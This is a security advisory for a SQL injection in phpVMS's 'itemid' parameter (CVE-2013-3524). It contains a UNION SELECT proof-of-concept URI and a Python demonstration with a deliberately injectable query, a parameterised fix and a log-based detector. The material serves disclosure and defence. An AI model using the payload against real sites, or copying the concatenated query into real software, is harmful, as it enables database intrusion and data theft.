phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
BID:59057
Info
| Field | Value |
| --- | --- |
| Bugtraq ID: | 59057 |
| Class: | Input Validation Error |
| CVE: | CVE-2013-3524 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2013 12:00AM |
| Updated: | May 22 2013 07:43PM |
| Credit: | NoGe |
| Vulnerable: | phpVMS Virtual Airline Administration 2.1.934, 2.1.935 |
| Not Vulnerable: | |
Discussion
phpVMS Virtual Airline Administration is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpVMS Virtual Airline Administration version 2.1.934 and version 2.1.935 are vulnerable.
Exploit / POC
An attacker can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--
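The defect the advisory describes, an unvalidated `itemid` spliced into the SQL text, shown next to the hardened form and a log check that flags the advisory's style of URI. This is an added example, not phpVMS code: it uses an in-memory SQLite table as a constructed stand-in for the news table (the real schema and column names are not reproduced, and the MySQL functions in the URI above are adapted to SQLite's `sqlite_version()` with literals standing in for `database()` and `user()`). The names `SELECT_NEWS`, `ITEMID_RE`, `make_db`, `popup_news_item_vulnerable`, `is_valid_itemid`, `popup_news_item_fixed`, `suspicious_itemid_requests`, `PAYLOAD` and `SAMPLE_LOG` are chosen here, and the log lines are constructed.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Query prefix for the news lookup; the table and columns are a constructed
# stand-in for phpVMS's real schema, which this example does not reproduce.
SELECT_NEWS = "SELECT id, subject, body, postdate, author FROM news WHERE id="

# A single decimal id of bounded length is the only shape itemid may take.
ITEMID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """Constructed in-memory database holding one news item (sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE news (id INTEGER, subject TEXT, body TEXT, postdate TEXT, author TEXT)"
    )
    con.execute(
        "INSERT INTO news VALUES (123, 'Welcome', 'First post', '2013-04-15', 'admin')"
    )
    return con


def popup_news_item_vulnerable(con, itemid):
    """Anti-pattern from the advisory: the raw parameter is concatenated into the
    statement, so a UNION appended to itemid is executed as SQL."""
    return con.execute(SELECT_NEWS + itemid).fetchall()


def is_valid_itemid(itemid):
    """True only when the parameter is a plain positive integer."""
    return ITEMID_RE.fullmatch(itemid) is not None


def popup_news_item_fixed(con, itemid):
    """Hardened form: reject anything but an integer, then bind it as a
    parameter so the database never parses user input as SQL."""
    if not is_valid_itemid(itemid):
        raise ValueError("itemid must be a positive integer")
    return con.execute(SELECT_NEWS + "?", (int(itemid),)).fetchall()


def suspicious_itemid_requests(log_lines):
    """Flag access-log entries whose itemid query value is not a plain integer.
    Checking the expected shape catches the UNION-style URI without relying on
    a payload signature."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m is None:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        if any(not is_valid_itemid(v) for v in params.get("itemid", [])):
            flagged.append(line)
    return flagged


# The advisory's URI payload adapted to SQLite: version() becomes
# sqlite_version(); database() and user() have no equivalent, so literals stand in.
PAYLOAD = "123 union select 1,sqlite_version(),'db',4,'user'--"

# Constructed sample log lines in common log format; not from any real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Apr/2013:10:00:00 +0000] '
    '"GET /path/index.php/PopUpNews/popupnewsitem/?itemid=123 HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Apr/2013:10:00:05 +0000] '
    '"GET /path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()-- HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", popup_news_item_vulnerable(con, PAYLOAD))
    print("fixed:", popup_news_item_fixed(con, "123"))
    try:
        popup_news_item_fixed(con, PAYLOAD)
    except ValueError as exc:
        print("fixed rejected payload:", exc)
    print("flagged:", suspicious_itemid_requests(SAMPLE_LOG))
```

Against the concatenated query the adapted payload returns a second row carrying the database version, which is what the advisory's URI extracts; the parameterised form rejects the same input before any query runs, and the log check singles out the request whose `itemid` is not a bare integer.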
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].